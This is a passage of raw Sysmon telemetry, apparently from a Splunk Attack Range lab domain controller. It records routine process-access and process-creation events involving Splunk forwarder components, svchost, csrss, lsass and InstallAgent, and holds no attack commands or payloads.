Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.028{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9508-6005-5105-00000000A301}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.028{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.028{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.028{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.028{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.028{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9508-6005-5105-00000000A301}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.028{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9508-6005-5105-00000000A301}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:48.029{59A5CD1D-9508-6005-5105-00000000A301}3796C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018586Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:49.637{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9509-6005-5305-00000000A301}1716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018585Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:49.637{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018584Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:49.637{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018583Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:49.637{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018582Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:49.637{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018581Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:49.637{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9509-6005-5305-00000000A301}1716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:49.637{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9509-6005-5305-00000000A301}1716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:02:49.638{59A5CD1D-9509-6005-5305-00000000A301}1716C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000018608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.433{59A5CD1D-8E44-6005-0B00-00000000A301}856588C:\Windows\system32\lsass.exe{59A5CD1D-8E42-6005-0100-00000000A301}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+2c2c4|C:\Windows\system32\lsasrv.dll+31819|C:\Windows\system32\lsasrv.dll+2f177|C:\Windows\system32\lsasrv.dll+2e101|C:\Windows\system32\lsasrv.dll+16cdd|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 10341000x800000000000000018607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.214{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.183{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.183{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.100{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.100{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.100{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.100{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018600Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.074{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-9526-6005-5505-00000000A301}6516C:\Windows\System32\InstallAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018599Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:03:18.074{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9526-6005-5505-00000000A301}6516C:\Windows\System32\InstallAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018598Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 